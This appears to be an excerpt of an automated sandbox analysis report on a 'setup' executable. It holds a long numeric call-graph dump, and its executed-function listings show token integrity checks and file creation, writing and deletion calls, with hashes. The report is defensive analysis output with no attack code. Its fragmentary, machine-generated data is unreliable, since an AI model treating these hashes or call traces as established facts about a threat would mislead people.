baa4e0 42 API calls 45473->45475 45476 baa5d6 45475->45476 45476->45320 45477 baa543 45492 d851df 40 API calls __cftof 45477->45492 45479->45470 45493 d852ff 13 API calls __dosmaperr 45479->45493 45480 baa54e 45480->45320 45482 baa588 45494 d851df 40 API calls __cftof 45482->45494 45484->45328 45485->45341 45486->45369 45487->45377 45488->45380 45489->45370 45490->45323 45491->45477 45492->45480 45493->45482 45494->45470 45495->45473 45497 d003a7 45496->45497 45498 d009a3 45496->45498 45499 d003dc CreateFileW 45497->45499 45518 d003c8 45497->45518 45498->45385 45501 d0040d GetLastError 45499->45501 45499->45518 45501->45518 45502 baacf0 52 API calls 45502->45518 45503 d004ed 45504 d004f8 45503->45504 45504->45498 45506 d00511 45504->45506 45507 d00748 45504->45507 45505 d009ca 45508 baa9b0 2 API calls 45505->45508 45509 baacf0 52 API calls 45506->45509 45507->45498 45514 baacf0 52 API calls 45507->45514 45510 d009d4 45508->45510 45511 d00516 45509->45511 45512 baa9b0 2 API calls 45510->45512 45511->45505 45520 d00541 45511->45520 45521 d0054c 45511->45521 45513 d009de 45512->45513 45517 d0075f 45514->45517 45517->45510 45526 d00795 45517->45526 45527 d0078a 45517->45527 45518->45497 45518->45499 45518->45501 45518->45502 45518->45503 45518->45505 45610 d00b90 151 API calls _ValidateLocalCookies 45518->45610 45611 baa2a0 49 API calls 45518->45611 45612 baa830 42 API calls 4 library calls 45518->45612 45613 cc7090 123 API calls 45518->45613 45614 baa600 RtlAllocateHeap RaiseException 45518->45614 45615 baa2a0 49 API calls 45520->45615 45616 baa830 42 API calls 4 library calls 45521->45616 45522 d0047d OutputDebugStringW 45522->45518 45525 d0054a 45617 cc7090 123 API calls 45525->45617 45622 baa830 42 API calls 4 library calls 45526->45622 45621 baa2a0 49 API calls 45527->45621 45532 d00793 45623 cc7090 123 API calls 45532->45623 45533 d0056b 45618 cb20c0 123 API calls 45533->45618 45536 d00581 OutputDebugStringW 45541 d005a6 45536->45541 45537 d007b4 45624 cb20c0 123 API calls 45537->45624 45539 d007ca OutputDebugStringW 45540 d007ef 45539->45540 45544 d00836 WriteFile FlushFileBuffers 45540->45544 45545 d0082e 45540->45545 45542 d00601 45541->45542 45543 d005f4 SetFilePointer 45541->45543 45542->45498 45546 d00617 WriteFile FlushFileBuffers 45542->45546 45543->45542 45549 d0086b 45544->45549 45545->45544 45547 cd1040 28 API calls 45546->45547 45548 d00637 45547->45548 45550 baacf0 52 API calls 45548->45550 45625 baa830 42 API calls 4 library calls 45549->45625 45552 d0064b 45550->45552 45552->45505 45619 ba9d10 71 API calls 45552->45619 45553 d00877 45587 d009e0 45553->45587 45556 bc2290 120 API calls 45557 d00898 45556->45557 45562 bc2290 120 API calls 45557->45562 45559 d006b1 45561 bc2290 120 API calls 45559->45561 45563 d006c3 WriteFile FlushFileBuffers 45561->45563 45564 d008c5 WriteFile FlushFileBuffers 45562->45564 45565 d006fe 45563->45565 45566 d008fd 45564->45566 45567 baacf0 52 API calls 45565->45567 45568 baacf0 52 API calls 45566->45568 45569 d0070b 45567->45569 45570 d0090a 45568->45570 45569->45505 45569->45549 45572 d0073a 45569->45572 45570->45505 45571 d00912 45570->45571 45573 d00940 45571->45573 45574 d00935 45571->45574 45620 baa2a0 49 API calls 45572->45620 45627 baa830 42 API calls 4 library calls 45573->45627 45626 baa2a0 49 API calls 45574->45626 45578 d0093e 45579 d0094c WriteFile FlushFileBuffers 45578->45579 45579->45498 45581 d00989 45579->45581 45580 d00743 45580->45553 45581->45385 45582->45387 45583->45398 45584->45399 45585->45410 45586->45409 45588 d00a51 45587->45588 45591 d00aad 45587->45591 45589 baacf0 52 API calls 45588->45589 45590 d00a56 45589->45590 45592 d00a60 45590->45592 45593 d00b7c 45590->45593 45596 baacf0 52 API calls 45591->45596 45597 d00a81 45592->45597 45598 d00a8c 45592->45598 45594 baa9b0 2 API calls 45593->45594 45595 d00b86 45594->45595 45599 d00b17 45596->45599 45641 baa2a0 49 API calls 45597->45641 45642 baa830 42 API calls 4 library calls 45598->45642 45599->45593 45602 d00b1d 45599->45602 45605 d00b4a 45602->45605 45606 d00b3f 45602->45606 45603 d7fd55 _ValidateLocalCookies 5 API calls 45604 d00886 45603->45604 45604->45556 45628 cb49f0 45605->45628 45643 baa2a0 49 API calls 45606->45643 45609 d00a8a 45609->45603 45610->45518 45611->45518 45612->45518 45613->45522 45614->45518 45615->45525 45616->45525 45617->45533 45618->45536 45619->45559 45620->45580 45621->45532 45622->45532 45623->45537 45624->45539 45625->45553 45626->45578 45627->45579 45629 cb4a5a 45628->45629 45630 cb49fd MultiByteToWideChar 45628->45630 45644 baa600 RtlAllocateHeap RaiseException 45629->45644 45630->45629 45633 cb4a15 45630->45633 45632 cb4a61 45632->45609 45634 cb4a30 MultiByteToWideChar 45633->45634 45635 cb4a69 45634->45635 45636 cb4a47 45634->45636 45637 baa9b0 2 API calls 45635->45637 45636->45609 45638 cb4a73 45637->45638 45645 cb4c70 54 API calls 45638->45645 45640 cb4a92 45640->45609 45641->45609 45642->45609 45643->45609 45644->45632 45645->45640 45646 bdc690 45706 bb1d80 70 API calls 3 library calls 45646->45706 45648 bdc6d9 45649 bdc6fe 45648->45649 45713 bad630 41 API calls 3 library calls 45648->45713 45707 ba8960 40 API calls 2 library calls 45649->45707 45652 bdc70d 45708 ba8300 41 API calls 2 library calls 45652->45708 45654 bdc731 45709 d1f560 45654->45709 45657 bdc81d 45658 d851ef std::_Throw_Cpp_error 40 API calls 45657->45658 45660 bdc822 45658->45660 45659 bdc77e std::ios_base::_Ios_base_dtor 45661 bdc7ef 45659->45661 45662 bdc7b3 LoadLibraryExW 45659->45662 45663 baacf0 52 API calls 45660->45663 45666 d7fd55 _ValidateLocalCookies 5 API calls 45661->45666 45662->45661 45664 bdc7c5 GetProcAddress GetProcAddress GetProcAddress 45662->45664 45665 bdc86a 45663->45665 45664->45661 45667 bdc981 45665->45667 45673 bdc874 45665->45673 45668 bdc817 45666->45668 45669 baa9b0 2 API calls 45667->45669 45670 bdc98b 45669->45670 45671 baacf0 52 API calls 45670->45671 45672 bdc9c3 45671->45672 45674 bdcabc 45672->45674 45681 baacf0 52 API calls 45672->45681 45675 bc2290 120 API calls 45673->45675 45676 baa9b0 2 API calls 45674->45676 45677 bdc8b9 45675->45677 45678 bdcac6 45676->45678 45679 bc2290 120 API calls 45677->45679 45680 bdc8c8 45679->45680 45682 bc2290 120 API calls 45680->45682 45683 bdc9ea 45681->45683 45684 bdc8d7 45682->45684 45683->45674 45688 baacf0 52 API calls 45683->45688 45685 bdc8fb 45684->45685 45686 bc2290 120 API calls 45684->45686 45714 ba8300 41 API calls 2 library calls 45685->45714 45687 bdc8ec 45686->45687 45689 bc2290 120 API calls 45687->45689 45691 bdca0e 45688->45691 45689->45685 45691->45674 45693 baacf0 52 API calls 45691->45693 45692 bdc938 45694 bdca39 45693->45694 45694->45674 45695 bdca3d 45694->45695 45715 bc2b70 42 API calls 45695->45715 45697 bdca5c 45716 bc2b70 42 API calls 45697->45716 45699 bdca67 45717 bc2b70 42 API calls 45699->45717 45701 bdca72 45718 bc2b70 42 API calls 45701->45718 45703 bdca8f 45719 bde860 42 API calls 45703->45719 45705 bdca9b 45706->45648 45707->45652 45708->45654 45710 d1f5a7 45709->45710 45712 bdc744 45710->45712 45720 d1f650 45710->45720 45712->45657 45712->45659 45713->45649 45714->45692 45715->45697 45716->45699 45717->45701 45718->45703 45719->45705 45721 d1f69d 45720->45721 45722 d1f69f CreateFileW 45720->45722 45721->45722 45723 d1f6bf 45722->45723 45734 bc2200 45723->45734 45725 d1f6ee __set_se_translator 45726 d1f757 45725->45726 45727 d1f73a WriteFile 45725->45727 45730 d1f7dd 45726->45730 45731 d1f787 std::ios_base::_Ios_base_dtor 45726->45731 45727->45725 45727->45726 45728 d1f7c9 45728->45712 45729 d1f7bb CloseHandle 45729->45728 45732 d851ef std::_Throw_Cpp_error 40 API calls 45730->45732 45731->45728 45731->45729 45733 d1f7e2 45732->45733 45735 bc2210 45734->45735 45736 bc2273 45734->45736 45737 bc2218 45735->45737 45738 bc2246 45735->45738 45751 ba7d00 41 API calls std::_Throw_Cpp_error 45736->45751 45740 bc221f 45737->45740 45741 bc2278 45737->45741 45742 bc2262 45738->45742 45744 d7fd94 std::_Facet_Register 2 API calls 45738->45744 45743 d7fd94 std::_Facet_Register 2 API calls 45740->45743 45752 ba8830 41 API calls 3 library calls 45741->45752 45742->45725 45746 bc2225 45743->45746 45747 bc2250 45744->45747 45748 d851ef std::_Throw_Cpp_error 40 API calls 45746->45748 45749 bc222e 45746->45749 45747->45725 45750 bc2282 45748->45750 45749->45725 45752->45746 45753 bdc5d0 45754 bdc5e3 std::ios_base::_Ios_base_dtor 45753->45754 45759 d8198d 45754->45759 45757 bdc5f9 SetUnhandledExceptionFilter 45758 bdc60b 45757->45758 45760 d819c5 __set_se_translator 50 API calls 45759->45760 45761 d81996 45760->45761 45762 d819c5 __set_se_translator 50 API calls 45761->45762 45763 bdc5ed 45762->45763 45763->45757 45763->45758 45764 bb9f0b 45765 bb9f2c GetWindowLongW CallWindowProcW 45764->45765 45766 bb9f16 CallWindowProcW 45764->45766 45767 bb9f7b 45765->45767 45768 bb9f60 GetWindowLongW 45765->45768 45766->45767 45768->45767 45769 bb9f6d SetWindowLongW 45768->45769 45769->45767 45770 d7f902 GetProcessHeap HeapAlloc 45771 d7f91e 45770->45771 45772 d7f91a 45770->45772 45780 d7f694 45771->45780 45774 d7f929 45775 d7f945 45774->45775 45777 d7f939 45774->45777 45794 d7f7a0 15 API calls __set_se_translator 45775->45794 45778 d7f963 45777->45778 45779 d7f952 GetProcessHeap HeapFree 45777->45779 45779->45772 45781 d7f6a1 DecodePointer 45780->45781 45782 d7f6ae LoadLibraryExA 45780->45782 45781->45774 45783 d7f6c7 45782->45783 45784 d7f73f 45782->45784 45795 d7f744 GetProcAddress EncodePointer 45783->45795 45784->45774 45786 d7f6d7 45786->45784 45796 d7f744 GetProcAddress EncodePointer 45786->45796 45788 d7f6ee 45788->45784 45797 d7f744 GetProcAddress EncodePointer 45788->45797 45790 d7f705 45790->45784 45798 d7f744 GetProcAddress EncodePointer 45790->45798 45792 d7f71c 45792->45784 45793 d7f723 DecodePointer 45792->45793 45793->45784 45794->45777 45795->45786 45796->45788 45797->45790 45798->45792 45799 c889f0 GetSystemDirectoryW 45800 c88afb 45799->45800 45801 c88a3f 45799->45801 45802 d7fd55 _ValidateLocalCookies 5 API calls 45800->45802 45801->45800 45803 baacf0 52 API calls 45801->45803 45804 c88b4b 45802->45804 45805 c88a4f 45803->45805 45806 c88a59 45805->45806 45807 c88b53 45805->45807 45810 c88a75 45806->45810 45813 c88a83 45806->45813 45808 baa9b0 2 API calls 45807->45808 45809 c88b5d 45808->45809 45811 d7fd94 std::_Facet_Register 2 API calls 45809->45811 45822 baa2a0 49 API calls 45810->45822 45817 c88cb2 45811->45817 45813->45813 45823 baa830 42 API calls 4 library calls 45813->45823 45814 c88a81 45816 bc2290 120 API calls 45814->45816 45819 c88ac2 45816->45819 45818 bc2290 120 API calls 45820 c88ae9 45818->45820 45819->45818 45820->45800 45821 c88aff LoadLibraryExW 45820->45821 45821->45800 45822->45814 45823->45814 45824 baac40 45825 baac49 45824->45825 45826 baac86 45824->45826 45825->45826 45828 baaa70 45825->45828 45829 baaab1 45828->45829 45831 baaa99 45828->45831 45830 baaad1 RtlReAllocateHeap 45829->45830 45832 baaab8 45829->45832 45830->45826 45831->45826 45832->45826 45833 baabc0 45834 baac04 45833->45834 45835 baabcc 45833->45835 45835->45834 45836 baa9b0 2 API calls 45835->45836 45836->45834 45837 cb08f0 45838 cb0927 45837->45838 45844 cb0967 45837->45844 45839 d80260 4 API calls 45838->45839 45840 cb0931 45839->45840 45840->45844 45845 d80118 43 API calls 45840->45845 45842 cb0953 45846 d80216 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 45842->45846 45845->45842 45846->45844 45847 d97f27 GetLastError 45848 d97f3d 45847->45848 45852 d97f43 45847->45852 45882 d99c6f 6 API calls __Getctype 45848->45882 45867 d97f47 SetLastError 45852->45867 45870 d99cae 45852->45870 45856 d97f8d 45859 d99cae __Getctype 6 API calls 45856->45859 45857 d97f7c 45858 d99cae __Getctype 6 API calls 45857->45858 45860 d97f8a 45858->45860 45861 d97f99 45859->45861 45864 d9817e ___free_lconv_mon 11 API calls 45860->45864 45862 d97f9d 45861->45862 45863 d97fb4 45861->45863 45866 d99cae __Getctype 6 API calls 45862->45866 45883 d97c04 13 API calls __Getctype 45863->45883 45864->45867 45866->45860 45868 d97fbf 45869 d9817e ___free_lconv_mon 11 API calls 45868->45869 45869->45867 45884 d99a1e 45870->45884 45873 d99ce8 TlsSetValue 45874 d97f5f 45874->45867 45875 d99720 45874->45875 45880 d9972d __Getctype 45875->45880 45876 d9976d 45893 d852ff 13 API calls __dosmaperr 45876->45893 45877 d99758 RtlAllocateHeap 45878 d97f74 45877->45878 45877->45880 45878->45856 45878->45857 45880->45876 45880->45877 45892 d95443 EnterCriticalSection std::_Facet_Register 45880->45892 45882->45852 45883->45868 45885 d99a48 45884->45885 45886 d99a4c 45884->45886 45885->45873 45885->45874 45886->45885 45891 d99953 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary ___vcrt_InitializeCriticalSectionEx 45886->45891 45888 d99a60 45888->45885 45889 d99a66 GetProcAddress 45888->45889 45889->45885 45890 d99a76 __Getctype 45889->45890 45890->45885 45891->45888 45892->45880 45893->45878 45894 cf2170 45895 baacf0 52 API calls 45894->45895 45896 cf21c2 45895->45896 45899 baacf0 52 API calls 45896->45899 45906 cf3a7f 45896->45906 45897 baa9b0 2 API calls 45898 cf3bfc 45897->45898 45900 cf21e8 45899->45900 45901 baacf0 52 API calls 45900->45901 45900->45906 45902 cf2372 45901->45902 45902->45906 45907 d119e0 45902->45907 45904 cf38c5 45928 cb5620 13 API calls ___std_exception_destroy 45904->45928 45906->45897 45908 d11a46 CreateThread 45907->45908 45909 d11a18 CreateEventW 45907->45909 45910 d11b5d WaitForSingleObject GetExitCodeThread 45908->45910 45919 d11a82 45908->45919 45971 d11d90 45908->45971 45911 d11a2d 45909->45911 45912 d11b98 45910->45912 45913 d11b8a CloseHandle 45910->45913 45911->45908 45912->45904 45913->45912 45914 d11bae 45916 baa9b0 2 API calls 45914->45916 45915 d11b40 45915->45910 45917 d11bb8 45916->45917 45918 d11bf1 WaitForSingleObject 45917->45918 45921 d11bfa 45917->45921 45918->45921 45919->45914 45919->45915 45920 baa9b0 2 API calls 45923 d11d86 45920->45923 45926 d11c48 45921->45926 45927 d11d1e 45921->45927 45929 cf0ce0 45921->45929 45956 d11bc0 45923->45956 45925 d11d99 45925->45904 45926->45920 45926->45927 45927->45904 45928->45906 45930 cf0d15 45929->45930 45931 baa9b0 2 API calls 45930->45931 45936 cf0d1e 45930->45936 45932 cf1517 45931->45932 45933 baa9b0 2 API calls 45932->45933 45934 cf1521 45933->45934 45935 baa9b0 2 API calls 45934->45935 45937 cf152b 45935->45937 45936->45921 45938 baa9b0 2 API calls 45937->45938 45946 cf1535 45938->45946 45939 cf1825 45940 d7fd55 _ValidateLocalCookies 5 API calls 45939->45940 45941 cf1840 45940->45941 45941->45921 45942 cf1848 45943 baa9b0 2 API calls 45942->45943 45944 cf1852 45943->45944 45945 baa4e0 42 API calls 45945->45946 45946->45939 45946->45942 45946->45945 45947 bc2290 120 API calls 45946->45947 45948 cf1778 DeleteFileW 45946->45948 45955 cf176a 45946->45955 45947->45946 45950 cf1783 GetLastError 45948->45950 45948->45955 45950->45955 45955->45946 45955->45948 45966 baa6b0 42 API calls 4 library calls 45955->45966 45967 ce30f0 54 API calls 45955->45967 45968 ce3190 55 API calls std::_Throw_Cpp_error 45955->45968 45969 ccb3a0 109 API calls 3 library calls 45955->45969 45970 ccbbf0 126 API calls _wcsrchr 45955->45970 45957 d11bf1 WaitForSingleObject 45956->45957 45960 d11bfa 45956->45960 45957->45960 45958 d11c48 45959 baa9b0 2 API calls 45958->45959 45965 d11d1e 45958->45965 45962 d11d86 45959->45962 45960->45958 45961 cf0ce0 133 API calls 45960->45961 45960->45965 45961->45960 45963 d11bc0 133 API calls 45962->45963 45964 d11d99 45963->45964 45964->45925 45965->45925 45966->45955 45967->45955 45968->45955 45969->45955 45970->45955 45972 d11bc0 134 API calls 45971->45972 45973 d11d99 45972->45973 45974 cf0ab0 45975 cf0b10 45974->45975 45976 baa4e0 42 API calls 45975->45976 45977 cf0b18 45976->45977 45978 baa4e0 42 API calls 45977->45978 45979 cf0b37 45978->45979 45980 cf0bd7 45979->45980 45981 cf0bfd 45979->45981 45982 bc2290 120 API calls 45980->45982 45983 baa9b0 2 API calls 45981->45983 45984 cf0be7 45982->45984 45985 cf0c07 45983->45985 45991 cf1870 45985->45991 45987 cf0c51 45988 cf0c1f 45988->45987 45989 baa9b0 2 API calls 45988->45989 45990 cf0c62 45989->45990 45992 cf1933 45991->45992 45993 cf18bb SetFilePointer 45991->45993 45992->45988 45994 cf18e6 GetLastError 45993->45994 45995 cf1971 45993->45995 46027 ccef90 73 API calls 45994->46027 45996 baacf0 52 API calls 45995->45996 45998 cf1991 45996->45998 46000 cf1caf 45998->46000 46011 cf1b75 45998->46011 46014 cf19cf 45998->46014 45999 cf1903 46028 ccbee0 105 API calls 45999->46028 46002 baa9b0 2 API calls 46000->46002 46004 cf1cb9 46002->46004 46003 cf191b 46029 cdbe90 54 API calls 46003->46029 46005 baa9b0 2 API calls 46004->46005 46007 cf1cc3 46005->46007 46007->45988 46008 cf19d2 ReadFile 46009 cf1c31 GetLastError 46008->46009 46008->46014 46034 ccef90 73 API calls 46009->46034 46011->45988 46012 cf1c4e 46035 ccbee0 105 API calls 46012->46035 46014->46000 46014->46004 46014->46008 46014->46009 46014->46011 46016 cf1a28 ReadFile 46014->46016 46017 cf1c22 46014->46017 46018 cf1bd0 GetLastError 46014->46018 46023 baa4e0 42 API calls 46014->46023 46030 baa830 42 API calls 4 library calls 46014->46030 46015 cf1c68 46036 cdbe90 54 API calls 46015->46036 46016->46014 46016->46018 46017->46011 46031 ccef90 73 API calls 46018->46031 46021 cf1bed 46032 ccbee0 105 API calls 46021->46032 46023->46014 46024 cf1c07 46033 cdbe90 54 API calls 46024->46033 46027->45999 46028->46003 46030->46014 46031->46021 46032->46024 46034->46012 46035->46015 46037 bf8c40 46038 bf8ca1 46037->46038 46046 bf8cd8 46037->46046 46039 bf8d5e 46038->46039 46040 bf8cac 46038->46040 46170 ba7d00 41 API calls std::_Throw_Cpp_error 46039->46170 46042 bf8cba 46040->46042 46043 bf8ce3 46040->46043 46044 bf8d63 46042->46044 46045 bf8cc5 46042->46045 46043->46046 46049 d7fd94 std::_Facet_Register 2 API calls 46043->46049 46171 ba8830 41 API calls 3 library calls 46044->46171 46048 d7fd94 std::_Facet_Register 2 API calls 46045->46048 46050 bf8ccb 46048->46050 46049->46046 46050->46046 46051 d851ef std::_Throw_Cpp_error 40 API calls 46050->46051 46052 bf8d6d 46051->46052 46055 bf8ef6 46052->46055 46172 ba7f60 41 API calls std::_Throw_Cpp_error 46052->46172 46053 bf8fc3 46081 bf9178 46053->46081 46190 c59ea0 153 API calls _ValidateLocalCookies 46053->46190 46055->46053 46142 cbd230 52 API calls 2 library calls 46055->46142 46057 bf8fda 46191 c0c1e0 InterlockedPushEntrySList InterlockedPushEntrySList 46057->46191 46059 bf8de9 46173 c76c70 41 API calls 46059->46173 46062 bf8f4a 46143 ccf520 46062->46143 46063 bf8dfa 46174 ba7e40 40 API calls 46063->46174 46068 bf8e07 46175 ba8960 40 API calls 2 library calls 46068->46175 46069 bf91dd 46197 c03f70 41 API calls 46069->46197 46072 bf8f98 46074 bf8fb0 46072->46074 46188 bb3980 41 API calls 46072->46188 46073 bf8e1b 46176 ba8960 40 API calls 2 library calls 46073->46176 46189 ba8960 40 API calls 2 library calls 46074->46189 46079 bf9208 46198 c03f70 41 API calls 46079->46198 46141 bf949b 46081->46141 46196 c03f70 41 API calls 46081->46196 46082 bf8fe5 46082->46081 46192 bf0580 54 API calls 2 library calls 46082->46192 46083 bf9233 46199 c03f70 41 API calls 46083->46199 46084 bf8e99 46084->46055 46182 ba7f60 41 API calls std::_Throw_Cpp_error 46084->46182 46085 bf8e27 46085->46055 46085->46084 46177 ba7f60 41 API calls std::_Throw_Cpp_error 46085->46177 46088 bf9566 46212 ba8960 40 API calls 2 library calls 46088->46212 46089 bf90be 46089->46081 46193 ba8db0 41 API calls 46089->46193 46093 bf925e 46200 c03f70 41 API calls 46093->46200 46095 bf957a 46213 bea940 44 API calls _ValidateLocalCookies 46095->46213 46096 bf8e5b 46178 c76c70 41 API calls 46096->46178 46099 bf8eb8 46183 c76c70 41 API calls 46099->46183 46100 bf8e6c 46179 ba7e40 40 API calls 46100->46179 46103 bf959d 46107 d7fd55 _ValidateLocalCookies 5 API calls 46103->46107 46106 bf8ec9 46184 ba7e40 40 API calls 46106->46184 46112 bf95b5 46107->46112 46108 bf8e79 46180 ba8960 40 API calls 2 library calls 46108->46180 46109 bf9289 46201 c03f70 41 API calls 46109->46201 46111 bf8ed6 46185 ba8960 40 API calls 2 library calls 46111->46185 46114 bf90f5 46194 bf34a0 6 API calls _ValidateLocalCookies 46114->46194 46116 bf8e8d 46181 ba8960 40 API calls 2 library calls 46116->46181 46117 bf8eea 46186 ba8960 40 API calls 2 library calls 46117->46186 46122 bf9129 46195 ba8960 40 API calls 2 library calls 46122->46195 46123 bf92b4 46202 c03f70 41 API calls 46123->46202 46126 bf92de 46203 bfa130 44 API calls 2 library calls 46126->46203 46128 bf932b 46204 ba8960 40 API calls 2 library calls 46128->46204 46130 bf945b 46208 bd1f90 40 API calls 2 library calls 46130->46208 46133 bf9467 46209 ba7e40 40 API calls 46133->46209 46136 bf948c 46210 ba8960 40 API calls 2 library calls 46136->46210 46139 bf9353 46139->46130 46140 ba8960 40 API calls 46139->46140 46205 bf9fa0 41 API calls 46139->46205 46206 cbe670 41 API calls 46139->46206 46207 ba7e40 40 API calls 46139->46207 46140->46139 46211 ba8960 40 API calls 2 library calls 46141->46211 46142->46062 46144 ccf579 46143->46144 46145 ccf594 46144->46145 46146 ccf596 CreateFileW 46144->46146 46145->46146 46147 ccf5ca std::ios_base::_Ios_base_dtor 46146->46147 46148 ccf5d6 46146->46148 46151 ccf919 CloseHandle 46147->46151 46152 ccf927 46147->46152 46214 ccf980 46148->46214 46150 ccf5fd ReadFile 46155 ccf631 46150->46155 46160 ccf625 std::ios_base::_Ios_base_dtor 46150->46160 46151->46152 46153 d7fd55 _ValidateLocalCookies 5 API calls 46152->46153 46154 bf8f80 46153->46154 46187 ba8960 40 API calls 2 library calls 46154->46187 46156 ccf668 SetFilePointer GetFileSize 46155->46156 46155->46160 46168 ccf6f7 __set_se_translator 46155->46168 46156->46160 46162 ccf692 46156->46162 46157 ccf970 46158 d851ef std::_Throw_Cpp_error 40 API calls 46157->46158 46159 ccf975 46158->46159 46160->46147 46160->46157 46161 ccf6d5 ReadFile 46161->46160 46161->46168 46162->46161 46163 ccf980 48 API calls 46162->46163 46165 ccf69d __set_se_translator 46162->46165 46163->46165 46165->46161 46166 ba8960 40 API calls 46166->46168 46168->46160 46168->46166 46169 ccf8ad ReadFile 46168->46169 46233 cd0180 149 API calls 46168->46233 46234 ba81d0 41 API calls std::locale::_Locimp::_Locimp 46168->46234 46169->46160 46169->46168 46171->46050 46172->46059 46173->46063 46174->46068 46175->46073 46176->46085 46177->46096 46178->46100 46179->46108 46180->46116 46181->46084 46182->46099 46183->46106 46184->46111 46185->46117 46186->46055 46187->46072 46188->46074 46189->46053 46190->46057 46191->46082 46192->46089 46193->46114 46194->46122 46195->46081 46196->46069 46197->46079 46198->46083 46199->46093 46200->46109 46201->46123 46202->46126 46203->46128 46204->46139 46205->46139 46206->46139 46207->46139 46208->46133 46209->46136 46210->46141 46211->46088 46212->46095 46213->46103 46215 ccfaec 46214->46215 46216 ccf9bf 46214->46216 46235 ba7d00 41 API calls std::_Throw_Cpp_error 46215->46235 46218 ccfa1c 46216->46218 46220 ccf9db 46216->46220 46221 ccfa2c 46216->46221 46219 ccfaf1 46218->46219 46218->46220 46236 ba8830 41 API calls 3 library calls 46219->46236 46223 d7fd94 std::_Facet_Register 2 API calls 46220->46223 46224 d7fd94 std::_Facet_Register 2 API calls 46221->46224 46227 ccf9ee std::locale::_Locimp::_Locimp __set_se_translator 46221->46227 46223->46227 46224->46227 46225 d851ef std::_Throw_Cpp_error 40 API calls 46226 ccfafb 46225->46226 46237 ccf120 LoadLibraryW 46226->46237 46227->46225 46231 ccfaa5 std::ios_base::_Ios_base_dtor 46227->46231 46230 ccf120 5 API calls 46232 ccfb40 SendMessageW SendMessageW 46230->46232 46231->46150 46232->46150 46233->46168 46234->46168 46236->46227 46238 ccf17b GetProcAddress 46237->46238 46239 ccf1a4 GetSystemMetrics GetSystemMetrics 46237->46239 46238->46239 46240 ccf18b 46238->46240 46241 ccf19f 46239->46241 46240->46239 46240->46241 46242 ccf20c 46241->46242 46243 ccf1fe FreeLibrary 46241->46243 46242->46230 46243->46242

                                                                                                                                                                              Executed Functions

                                                                                                                                                                              Function 00CC72E0 Relevance: 16.6, APIs: 11, Instructions: 117memoryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00CC7328
                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00CC7335
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CC733F
                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00DEB0F5), ref: 00CC7369
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CC736F
                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00DEB0F5,00DEB0F5,00DEB0F5,00DEB0F5), ref: 00CC7395
                                                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00CC73C8
                                                                                                                                                                              • EqualSid.ADVAPI32(00000000,?), ref: 00CC73D7
                                                                                                                                                                              • FreeSid.ADVAPI32(?), ref: 00CC73E6
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00CC7420
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Token$ErrorInformationLastProcess$AllocateCloseCurrentEqualFreeHandleInitializeOpen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 695978879-0
                                                                                                                                                                              • Opcode ID: c72bd60dcc5dc12780a505675e1899015b4253e91426f7025a4511b493e139c8
                                                                                                                                                                              • Instruction ID: 393da95fbd2d205c17e21a474556ed87da4b6c147708231fef71f5c843a5f97d
                                                                                                                                                                              • Opcode Fuzzy Hash: c72bd60dcc5dc12780a505675e1899015b4253e91426f7025a4511b493e139c8
                                                                                                                                                                              • Instruction Fuzzy Hash: 4F410A71904209DFDF10DFA5CC49BEEBBB8EF08714F14421AE921B21A0D7799A48DF64
                                                                                                                                                                              Function 00CCF120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 85libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 168 ccf120-ccf179 LoadLibraryW 169 ccf17b-ccf189 GetProcAddress 168->169 170 ccf1a4-ccf1e9 GetSystemMetrics * 2 168->170 169->170 171 ccf18b-ccf198 169->171 174 ccf1ec-ccf1fc 170->174 173 ccf19b-ccf19d 171->173 173->170 175 ccf19f-ccf1a2 173->175 176 ccf20c-ccf21f 174->176 177 ccf1fe-ccf205 FreeLibrary 174->177 175->174 177->176
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryW.KERNEL32(ComCtl32.dll,02141699,?,00000000,00000000), ref: 00CCF15E
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00CCF181
                                                                                                                                                                              • GetSystemMetrics.USER32(0000000C), ref: 00CCF1BC
                                                                                                                                                                              • GetSystemMetrics.USER32(0000000B), ref: 00CCF1D2
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00CCF1FF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
